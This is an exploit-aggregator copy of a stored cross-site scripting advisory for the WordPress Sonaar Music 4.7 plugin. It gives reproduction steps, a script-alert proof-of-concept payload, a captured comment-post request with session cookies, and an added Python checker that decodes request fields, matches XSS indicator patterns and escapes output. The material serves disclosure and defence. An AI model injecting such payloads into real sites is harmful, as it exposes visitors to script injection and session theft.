WordPress Sonaar Music 4.7 Cross Site Scripting

CVE: CVE-2021-24824
Category: CWE-79
Price: Not disclosed
Severity: High
Author: Kohei Matsumoto
Risk: High
Exploitation Type: Remote
Date: 2023-10-10
Our sensors found this exploit at:

Below is a copy:

WordPress Sonaar Music 4.7 Cross Site Scripting
# Exploit Title: WordPress Sonaar Music Plugin 4.7 - Stored XSS
# Date: 2023-09-05
# Exploit Author: Furkan Karaarslan
# Category: Webapps
# Vendor Homepage:
# Version: 4.7 (REQUIRED)
# Tested on: Windows/Linux
1-First install the Sonaar Music plugin.
2-Then go to the playlist add page.
3-Press the "Add new playlist" button.
4-Enter any title on the page that opens and publish the page.
5-Open the published page.
6-Paste the XSS payload into the comment section. Payload: <script>alert("XSS")</script>

POST /wp/wordpress/wp-comments-post.php HTTP/1.1
Content-Length: 155
Cache-Control: max-age=0
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie:; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486
Connection: close
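The captured request above shows the comment field reaching wp-comments-post.php as a normal form post, with the comment_author cookie carrying a value that is URL-encoded and HTML-entity-encoded at the same time. The following Python script is an added example, not code from the advisory or from the Sonaar Music plugin: it parses the captured request, decodes each cookie and form value through both encoding layers, flags fields that carry active-content indicators, and shows the escaping a rendering template must apply before echoing stored comment text. The request line, Content-Type and cookies are taken from the page; the form body is constructed here (the page omits it) and carries the advisory's payload so the check has something to find. The indicator patterns, field names and function names are this example's own choices.

```python
"""Review a captured wp-comments-post.php request for stored-XSS indicators.

Added example, not code from the advisory or from the Sonaar Music plugin.
The request line, Content-Type and the cookies come from the request captured
on the page; the body is constructed here because the page omits it.
"""
import html
import re
from urllib.parse import parse_qs, unquote_plus

# Captured headers from the page plus a constructed form body.
RAW_REQUEST = (
    "POST /wp/wordpress/wp-comments-post.php HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; "
    "wordpress_test_cookie=WP%20Cookie%20check\r\n"
    "\r\n"
    # Constructed body: the advisory's payload, URL-encoded as a browser sends it.
    "comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E"
    "&comment_post_ID=7&submit=Post+Comment"
)

# Conservative indicators of active content in a field that should be plain text.
INDICATORS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "event-handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript-uri": re.compile(r"javascript\s*:", re.I),
    "attribute-breakout": re.compile(r"""["']\s*>"""),
}


def normalize(value, rounds=3):
    """Undo URL encoding and HTML entities repeatedly until the value is stable.

    The captured cookie value a%22%26gt%3Balert%28%29 is URL-encoded and also
    contains an HTML entity (&gt;), so a single decoding pass would miss the
    '>' it turns into.
    """
    for _ in range(rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_indicators(value):
    """Return the sorted names of indicator patterns matching the decoded value."""
    decoded = normalize(value)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, headers, cookies and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, val = line.partition(":")
        headers[name.strip().lower()] = val.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            cookies[name] = val
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"method": method, "path": path, "headers": headers,
            "cookies": cookies, "form": form}


def review_request(raw):
    """Return one finding per cookie or form field that carries an indicator."""
    req = parse_request(raw)
    fields = [("cookie:" + k, v) for k, v in req["cookies"].items()]
    fields += [("form:" + k, v) for k, v in req["form"].items()]
    findings = []
    for location, value in fields:
        hits = find_xss_indicators(value)
        if hits:
            findings.append({"location": location, "indicators": hits,
                             "decoded": normalize(value)})
    return findings


def safe_render(value):
    """The escaping a template must apply before echoing stored comment text into HTML."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for f in review_request(RAW_REQUEST):
        print(f"{f['location']}: {f['indicators']} -> {f['decoded']!r}")
    print("escaped for output:", safe_render(normalize("%3Cscript%3E%3C%2Fscript%3E")))
```

Running the script flags both the comment field (script tag) and the comment_author cookie (attribute break-out after the nested `&gt;` decodes), which is the reason the decoder loops rather than decoding once. The same normalize-then-match logic works over access logs or a database dump of wp_comments; the escaping in safe_render is the output-side fix, independent of any input filtering.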


Copyright ©2024 Exploitalert.